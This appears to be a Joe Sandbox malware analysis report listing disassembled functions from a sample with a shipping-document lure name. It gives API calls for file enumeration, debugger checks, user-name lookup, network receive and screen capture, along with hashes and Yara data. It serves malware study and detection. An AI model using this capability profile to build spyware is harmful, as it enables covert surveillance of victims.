                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                      • String ID:
                                                      • API String ID: 4212172061-0
                                                      • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                      • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                      • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                      • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                      Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00408DAC
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$FirstH_prologNext
                                                      • String ID:
                                                      • API String ID: 301083792-0
                                                      • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                      • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                      • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                      • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                      Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                      • String ID:
                                                      • API String ID: 2829624132-0
                                                      • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                      • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                      • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                      • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                      Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                      • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                      • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                      • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                      Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                      • String ID:
                                                      • API String ID: 1815803762-0
                                                      • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                      • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                      • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                      • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                      Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                      • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                      • ExitProcess.KERNEL32 ref: 0044258E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                      • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                      • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                      • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                      Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                      • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                      • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                      • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                      Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: <D
                                                      • API String ID: 1084509184-3866323178
                                                      • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                      • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                      • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                      • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                      Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: <D
                                                      • API String ID: 1084509184-3866323178
                                                      • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                      • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                      • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                      • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                      Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                      • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                      • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                      • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                      Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                      • String ID:
                                                      • API String ID: 1663032902-0
                                                      • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                      • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                      • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                      • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                      Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                      • String ID:
                                                      • API String ID: 2692324296-0
                                                      • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                      • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                      • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                      • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                      Function 0041A7A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                      • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                      • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                      • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                      Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                      • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                      • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                      • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                      • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                      Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                      • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                      • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                      • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                      Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                      • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                      • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                      • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                      Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                      • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                      • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                      • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                      Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                      • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                      • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                      • Instruction Fuzzy Hash:
                                                      Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                      • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                      • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                      • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                      Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                        • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                      • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                      • DeleteDC.GDI32(?), ref: 0041805D
                                                      • DeleteDC.GDI32(00000000), ref: 00418060
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                      • GetIconInfo.USER32(?,?), ref: 004180CB
                                                      • DeleteObject.GDI32(?), ref: 004180FA
                                                      • DeleteObject.GDI32(?), ref: 00418107
                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                      • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                      • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                      • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                      • DeleteDC.GDI32(?), ref: 0041827F
                                                      • DeleteDC.GDI32(00000000), ref: 00418282
                                                      • DeleteObject.GDI32(00000000), ref: 00418285
                                                      • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                      • DeleteObject.GDI32(00000000), ref: 00418344
                                                      • GlobalFree.KERNEL32(?), ref: 0041834B
                                                      • DeleteDC.GDI32(?), ref: 0041835B
                                                      • DeleteDC.GDI32(00000000), ref: 00418366
                                                      • DeleteDC.GDI32(?), ref: 00418398
                                                      • DeleteDC.GDI32(00000000), ref: 0041839B
                                                      • DeleteObject.GDI32(?), ref: 004183A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                      • String ID: DISPLAY
